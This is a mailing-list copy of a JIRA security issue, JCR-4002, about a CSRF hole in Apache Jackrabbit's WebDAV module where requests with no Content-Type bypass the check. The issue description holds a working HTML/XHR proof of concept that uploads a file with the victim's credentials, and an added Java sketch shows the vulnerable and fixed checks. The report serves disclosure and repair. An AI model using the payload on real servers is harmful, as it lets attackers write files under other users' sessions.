Posted to dev@jackrabbit.apache.org by "Julian Reschke (JIRA)" <ji...@apache.org> on 2016/08/29 12:27:20 UTC

[jira] [Comment Edited] (JCR-4002) CSRF in Jackrabbit-Webdav using empty content-type

    [ https://issues.apache.org/jira/browse/JCR-4002?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=15424812#comment-15424812 ] 

Julian Reschke edited comment on JCR-4002 at 8/29/16 12:27 PM:
---------------------------------------------------------------

But that means that code extending from this now will have to the CSRF protection, right? If this is true, we need (a) to document that and (b) to review the existing code that *does* extend it (JSOP?), (c) figure out whether code written by third-parties might be affected as well.


was (Author: reschke):
But that means that code extending from this now will have to the CSRF protection, right? If this is true, we need (a) to document that and (b) to review the existing code that *does* extend it (JSOP?).

> CSRF in Jackrabbit-Webdav using empty content-type
> --------------------------------------------------
>
>                 Key: JCR-4002
>                 URL: https://issues.apache.org/jira/browse/JCR-4002
>             Project: Jackrabbit Content Repository
>          Issue Type: Bug
>          Components: jackrabbit-webdav
>    Affects Versions: 2.4.5, 2.6.5, 2.8.2, 2.10.3, 2.12.3, 2.13.1
>            Reporter: Dominique Jäggi
>            Assignee: Dominique Jäggi
>            Priority: Blocker
>              Labels: csrf, security, webdav
>             Fix For: 2.13.2
>
>         Attachments: JCR_4002__CSRF_in_Jackrabbit_Webdav_using_empty_content_type.patch
>
>
> As per [0] the CSRF content-type check does not include a null request content type. This can be exploited to create a resource via CSRF like so:
> {code}
> <html>
>   <body>
>     <script>
>       function submitRequest()
>       {
>         var xhr = new XMLHttpRequest();
>         xhr.open("POST", "http://localhost:42427/test/csrf.txt", true);
>         xhr.withCredentials = true;
>         var body = "This file has been uploaded via CSRF.=\r\n";
>         var aBody = new Uint8Array(body.length);
>         for (var i = 0; i < aBody.length; i++)
>           aBody[i] = body.charCodeAt(i); 
>         xhr.send(new Blob([aBody]));
>       }
>     </script>
>     <form action="#">
>       <input type="button" value="Submit request" onclick="submitRequest();" />
>     </form>
>   </body>
> </html>
> {code}
> I will mitigate this particular issue by including a null content type in the list of rejected content types.
> [0] https://github.com/cryptomator/cryptomator/issues/319
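
The content-type gate that the description and the proposed fix refer to, as an added illustration (not Jackrabbit's own CSRFUtil code): a vulnerable variant that lets a request with no Content-Type header pass, next to the corrected variant that puts the missing header on the rejected list. The class and method names and the set of form-like content types are assumptions; an XHR sending an untyped Blob, as in the PoC above, produces a request with no Content-Type header at all.

```java
import java.util.Arrays;
import java.util.List;
import java.util.Locale;

/** Illustrative CSRF content-type gate modelled on JCR-4002 (assumed names, not the project's code). */
public final class CsrfContentTypeCheck {

    // Content types a browser can send cross-origin from a <form> or XHR without a CORS preflight.
    private static final List<String> REJECTED_TYPES = Arrays.asList(
        "application/x-www-form-urlencoded", "multipart/form-data", "text/plain");

    /** Vulnerable variant: a POST without a Content-Type header is never treated as rejected. */
    public static boolean isRejectedBefore(String method, String contentType) {
        if (!"POST".equalsIgnoreCase(method)) {
            return false;
        }
        if (contentType == null) {
            return false; // the gap: an untyped Blob sent via XHR carries no Content-Type and slips through
        }
        return REJECTED_TYPES.contains(normalize(contentType));
    }

    /** Fixed variant: a missing Content-Type is treated like a form submission and rejected. */
    public static boolean isRejectedAfter(String method, String contentType) {
        if (!"POST".equalsIgnoreCase(method)) {
            return false;
        }
        return contentType == null || REJECTED_TYPES.contains(normalize(contentType));
    }

    // Drop parameters such as "; charset=UTF-8" and lower-case the media type before comparing.
    private static String normalize(String contentType) {
        int semi = contentType.indexOf(';');
        String mediaType = semi >= 0 ? contentType.substring(0, semi) : contentType;
        return mediaType.trim().toLowerCase(Locale.ROOT);
    }

    public static void main(String[] args) {
        System.out.println("before fix, no Content-Type: rejected=" + isRejectedBefore("POST", null));
        System.out.println("after fix,  no Content-Type: rejected=" + isRejectedAfter("POST", null));
        System.out.println("after fix,  text/plain;charset=UTF-8: rejected="
            + isRejectedAfter("POST", "text/plain;charset=UTF-8"));
        System.out.println("after fix,  application/json: rejected="
            + isRejectedAfter("POST", "application/json"));
    }
}
```

Only the null case differs between the two variants; a request flagged here would still be subject to whatever referrer or origin allow-list the deployment applies on top of this gate.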



--
This message was sent by Atlassian JIRA
(v6.3.4#6332)